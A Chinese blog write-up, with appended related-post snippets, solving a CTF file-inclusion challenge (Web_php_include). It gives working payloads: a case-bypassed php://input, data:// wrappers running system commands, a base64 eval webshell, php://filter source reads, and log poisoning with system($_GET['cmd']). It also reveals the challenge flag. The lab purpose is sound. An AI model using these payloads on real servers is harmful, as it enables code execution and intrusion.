攻防世界-Web_php_include详解

最新推荐文章于 2025-05-11 15:38:05 发布
最新推荐文章于 2025-05-11 15:38:05 发布
阅读量1.1w 收藏 78
点赞数 34
CC 4.0 BY-SA版权
分类专栏: 攻防世界web高手进阶 Web_php_include 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Mr_helloword/article/details/107929653
本文深入剖析PHP中文件动态包含的原理与安全风险,通过具体示例展示了如何利用php伪协议、data伪协议等手段绕过过滤,实现代码执行与flag获取。同时,介绍了常见伪协议的使用方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Web_php_include

源代码:

<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
    $page=str_replace("php://", "", $page);
}
include($page);
?>

分析:

根据show_source(FILE);,以及题目中的文件include,这道题用文件动态包含拿flag

strstr():
定义和用法:
搜索字符串在另一个字符串中是否存在,如果是,返回字符串及剩余部分,否则返回false。
区分大小写,stristr()函数不区分大小写
语法:
strstr(string,search,before_search)
string:必需,被搜索的字符串
search:必需,要搜索的字符串,若是数字,则搜索对应的ASCII值的字符
before_search:可选,默认为“false”,若为true,将返回search参数第一次出现之前的字符串部分

str_replace():
定义和用法:
以其它字符替换字符串中的一些字符(区分大小写)
语法:
str_replace(find,replace,string,count)
find,必需,要查找的值
replace,必需,要替换的值
string,必需,被搜索的字符串
count,可选,替换次数

while (strstr($page, "php://")) {       //判断包含的文件是否有php://有的话返回true
    $page=str_replace("php://", "", $page);     		//将包含文件中的php://替换成空
}

总结:程序过滤掉了page=参数传入php://

利用

方法1:

利用php伪协议大小写绕过

?page=PHP://input

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
flag:
$flag=“ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}”;

方法2:*

data伪协议代码执行

?page=data://text/plain,<?php system("ls")?>

在这里插入图片描述

?page=data://text/plain,<?php system("cat fl4gisisish3r3.php")?>

在这里插入图片描述
flag:
$flag=“ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}”;

方法3

data伪协议传入木马

<?php @eval($_POST[666]); ?> base64加密后拼接

菜刀连接

常用伪协议用法:

1.php伪协议
用法
php://input,用于执行php代码,需要post请求提交数据。
php://filter,用于读取源码,get提交参数。?a=php://filter/read=convert.base64/resource=xxx.php
需要开启allow_url_fopen:php://input、php://stdin、php://memory、php://temp
不需要开启allow_url_fopen:php://filter

2.、data协议

用法:
data://text/plain,xxxx(要执行的php代码)
data://text/plain;base64,xxxx(base64编码后的数据)
例:
?page=data://text/plain,
?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=

3.、file协议
用法:
file://[本地文件系统的绝对路径]

感谢博主的分享:https://www.cnblogs.com/observering/p/12824794.html

攻防世界(web篇)---Web_php_include
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-07 3979
hello传值 phpmyadmin写马 phpmyadmin变量secure_file_priv值为空,说明可以写入一句话木马 传🐎成功 测试🐎php://input 可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行利用该方法,我们可以直接写入php文件,输入file=php://input,然后使用burp抓包,写入php代码: file://协议 用于访问本地文件系统,不受allow_url_fopen与allow_url_include的影响即file:// [文..
攻防世界 Web_php_include(include)
Haowill的博客
04-15 1107
Web_php_include 一拿到这道题目看到include,我觉得像是一道文件包含漏洞的题目,这种漏洞一般做法有两种 1.包含的文件在本地上传一个webshell去,该webshell在本地,运行webshell就可以用菜刀去连上 2.如果包含的文件不本地,是远程的网上的文件,那么我们可以黑它远程的那个文件。这样也可以getshell。 拿到题目 很有意思这个题目给的是源代码。 <?...
攻防世界】四、Web_php_include
Hi~ 土拨鼠
01-20 586
步骤 打开所给的实验环境,发现给出代码,分析代码可知是文件包含漏洞: 其中含有两个参数: hello参数中的内容会被输出到页面 page参数中的内容则会被进行文件包含,但是会对php://进行过滤 两个函数: strstr(string,search[,before_search]):strstr() 函数搜索字符串(search)在另一字符串(string)中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE。区分大小写,stristr()函数不区分大小写。 string:必需。规定.
php一些函数
m0_54015794的博客
01-15 352
1.show_source()函数是PHP中的内置函数,用于返回突出显示PHP语法的文件。通过使用HTML标记突出显示语法 2.这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量 PHP采用的是C语言的bai语法,但是也有一些区du别zhi。这个符号的bai意思是:变量PHP采用的是C语言的bai语法,但是也有一些区du别zhi。符号加上字符dao串,这就是来一个变量源名或对象名。 MyClass是个类名,不用加符号。符号。符号。_va
web安全-file_include-攻防世界-江苏工匠杯
最新发布
2303_80806493的博客
05-11 1477
文件包含(File Inclusion)是一种将外部文件内容嵌入主程序的编程技术,用于代码复用、动态加载或模块化设计,常见于Web开发(如PHPinclude/require)或语言预处理(如C的#include),但若未校验用户输入或路径,可能引发本地/远程文件包含攻击(LFI/RFI)或目录遍历漏洞;
攻防世界-web Web_php_include
m0_48108919的博客
02-10 1450
根据题目这题应该要用到php文件包含 分析代码: strstr() 函数用法:搜索字符串在另一字符串中是否存在,如果是,返回该字符串及剩余部分,否则返回 FALSE(该函数是区分大小写的) //例如: echo strstr("Hello world!","world"); // 输出 world! str_replace() 函数用法:替换字符串中的一些字符(区分大小写) //例如: echo str_replace("world","Peter","Hello world!"); //输出Hell
攻防世界 - Web - Level 2 | Web_php_include
Blue17 の 小窝
12-22 1205
在 MySQL 中,写入文件是一项非常重要的任务,因为它允许您将数据持久化到硬盘上以进行后续分析。在本文中,我们将介绍 MySQL 写入文件的几种方法。该文章介绍了PHP伪协议中的file://和php://协议,以及利用data://协议实现了任意文件读取和命令执行的方法。文章还提供了具体的使用示例和注意事项。可以看到,他将自己的页面又包含了一遍,于是我就怀疑其存在远程文件包含,不过如果想要利用远程文件包含,需要用到一个服务器,这里我用的自己的阿里云的服务器进行演示。
攻防世界 - Web - Level 1 file_include
m0_74824687的博客
12-26 775
本题考察的是 PHP 的文件包含漏洞,一般 CTF 的文件包含漏洞考点都是 PHP 伪协议。文件中的,当然不乏改名的。我们在进行文件包含之前,先定位一下 Flag 文件的位置(这里可以使用工具扫,但笔者觉得没必要)。首先请求上面的 Payload 模板,并使用 BurpSuite 进行抓包,然后将 PHP 支持的字符编码作为参数替换。估计是对用户传入值进行一个检查的文件,然后就是直接进行文件包含了。的话,内容肯定会和我们直接访问一样,显示为空,所以我们需要对。下面我们就是尝试进行文件包含,直接包含。
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
2401_84208172的博客
05-24 2375
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
Web_php_include总结五种解法大同小异
yingyugo的博客
11-18 3585
Web_php_include解题详解 ————一念既出,万山无阻 分析——解题——总结 1.分析 代码不长,咱们慢慢分析 第一句是语法高亮,show_source() 函数对文件进行语法高亮显示。 本函数是 highlight_file() 的别名。 第二句是get 传给hello参数这里可以构造payload: /?hel
攻防世界题目练习——Web难度1(二)_&lt; php highlight_file(__file__); include(&quot;(1)
2301_79054215的博客
04-20 1373
是Linux中的一个特殊变量,它代表了当前的字段分隔符,它的默认值是空格、制表符和换行符,当输入命令时,会以空格、制表符或换行符作为分隔符,将输入的内容分割成不同的字段,每个字段将作为命令的一个参数进行解析和执行。现在我们知道了waf函数过滤的有哪些字符或字符串,我们要避免直接输入这些关键词,但是有些字符在我们查找flag的过程中不可避免地会用到,因此我们对它们进行绕过,绕过的方式有如下几种。函数进行了匹配,第一个参数是给定的用来模式匹配的正则表达式,第二个参数是输入的要匹配的字符串。
攻防世界:warmup详解
bjml_的博客
11-14 988
打开场景只有一个滑稽,没有任何描述。
攻防世界Web_php_include
qq_44111753的博客
11-16 252
WP 攻防世界 Web_php_include 题目 WP 很明显,这题目和文件包含漏洞有关,来分析代码吧 <?php show_source(__FILE__); echo $_GET['hello'];//将hello参数的值输出 $page=$_GET['page'];//get参数提交的page值赋给page while (strstr($page, "php://")) {//若"php://"在page中出现过 $page=str_replace("php://", "", $p
Web_php_include-攻防世界
szhangliwenya的博客
03-25 2248
secure_file_priv 这个变量被用于限制导入和导出的数据目录,比如 LOAD DATA 和 SELECT ... INTO OUTFILE 语句,以及 LOAD_FILE() 函数。MySQL 服务器在启动时,会检查 secure_file_priv 变量值,如果值不安全会在错误日志中写一个 WARNING 级别的日志。如果指定了目录,MySQL 会限制只能从该目录导入、或导出到该目录。下述使用data://伪协议,它让用户控制输入流,输入php代码,造成任意代码执行。
4.攻防世界Web_php_include
2401_86760082的博客
02-01 1504
利用strstr()函数大小写敏感特 性 strstr()函数特性 大小写绕过思路 PHP://input原理及作用 php://input是PHP中的非常有用的伪协议流工作原理、结合利用、构造请求
ctf-攻防世界-webWeb_php_include
一只菜鸟的博客
11-21 6346
先看题目标题,php_include,猜测为文件包含漏洞。 打开环境,看到这样一段代码:
攻防世界(高手进阶区)——Web_php_include
知足且坚定,温柔且上进
02-11 1883
做完此题后参考了其他大佬写的wp,发现方法不同,此题我才用的是通过一句话木马注入。 使用御剑扫一下目录: 发现熟悉的http://111.198.29.45:53486/phpmyadmin/,打开链接: 一般username与password都为root,但此题的username为root,密码为空; 在SQL处写入一句话木马和文件包含: select "<?php eval(@$_P...
攻防世界-Web-Web_php_include
uh_eng的博客
08-05 412
0x01 打开题目,代码如下: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> 构造payload简单验证一下是不是文件包含: ?hello=xxx&page=/etc/passwd 结果如下:
攻防世界Web_PHP_Include
Mrs_H的博客
10-04 669
攻防世界Web_PHP_Include 这是一道来自攻防世界web高手进阶题的其中一道题,题目很水,但是身为小白的我也遭遇到了各种各样的问题。所以写一下这道题我所用的wp思路,还有对于其他思路的一些看法。 法一 首先,我们先拿到了这道题的在线场景,打开一看 再结合着题目的意思这是一道文件包含题同时他过滤掉了php://伪协议,我第一反应就是换一个伪协议,将php://换成data://text/plain; 于是构造一个payload:?page=data://text/plain,<?%20sy
文件包含漏洞习题攻防世界
04-03
<think>好的,我现在需要处理用户关于文件包含漏洞的查询,特别是与CTF比赛、攻防世界以及防御方法相关的内容。首先,我需要回忆文件包含漏洞的基础知识,包括它的类型(比如本地文件包含LFI和远程文件包含RFI)、常见触发场景,以及如何利用这些漏洞进行攻击。 接下来,用户提到了CTF习题和实战演练,所以我应该查找相关的CTF题目或平台,比如攻防世界(XCTF)、DVWA、sqli-labs等,是否有涉及文件包含的题目。例如,DVWA中的File Inclusion模块可能是一个常见的练习环境。同时,CTF比赛中可能通过包含特定文件获取flag,或者利用PHP的伪协议(如php://filter)来读取源代码。 然后,用户可能需要具体的漏洞利用步骤,比如如何通过参数传递恶意路径,或者利用日志文件注入代码。此外,防御方法也是关键,比如输入验证、禁用危险函数(allow_url_include)、设置白名单等。 需要注意的是,引用用户提供的参考资料中的内容,比如引用[5]提到的DVWA中的fi漏洞测试,以及引用[3]关于防御webshell的文件监控。同时,要确保回答结构清晰,分点列出漏洞原理、CTF例题、利用方式、防御措施,并生成相关问题。 最后,检查是否满足系统级指令:行内公式用$,独立公式用$$,正确的中文回答,生成相关问题,并正确添加引用标识。确保LaTeX语法正确,比如在提到数学表达式时正确使用$包裹。</think>### 文件包含漏洞详解 #### 一、漏洞原理 文件包含漏洞(File Inclusion)允许攻击者通过动态加载文件的功能(如PHP的`include`、`require`)注入恶意文件路径,分为两类: 1. **本地文件包含(LFI)**:包含服务器本地文件,例如: `http://example.com/index.php?page=../../etc/passwd` 2. **远程文件包含(RFI)**:包含远程服务器文件(需`allow_url_include=On`),例如: `http://example.com/index.php?page=http://attacker.com/shell.txt` #### 二、CTF例题与实战 1. **攻防世界(XCTF)例题** - 题目描述:通过文件包含读取`/flag`文件 - 解法:使用PHP伪协议`php://filter`读取源码 ```http http://target.com/?file=php://filter/convert.base64-encode/resource=flag.php ``` 解码Base64获取flag[^5][^1] 2. **DVWA实战(File Inclusion模块)** -安全级别下直接包含`file3.php`触发XSS漏洞[^5] - 高级别需绕过路径限制,例如: `http://192.168.20.48/DVWA/vulnerabilities/fi/?page=file:///var/log/apache2/access.log` #### 三、漏洞利用方式 1. **敏感文件读取** - Linux:`/etc/passwd`、`/proc/self/environ` - Windows:`C:\Windows\system.ini` 2. **日志文件注入** 修改User-Agent为PHP代码,包含日志文件执行命令: ```http GET /?page=/var/log/apache2/access.log HTTP/1.1 User-Agent: <?php system($_GET['cmd']);?> ``` 3. **PHP伪协议利用** - `php://input`:直接执行POST数据 - `data://text/plain,<?php phpinfo();?>` #### 四、防御方法 1. **输入验证** 使用白名单限制包含的文件名,例如: ```php $allowed = ['home.php', 'about.php']; if (in_array($_GET['page'], $allowed)) { include($_GET['page']); } ``` 2. **禁用危险配置** - 设置`allow_url_include=Off` - 关闭错误回显(`display_errors=Off`) 3. **文件监控** 对Web目录实时监控,异常修改立即恢复[^3]
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值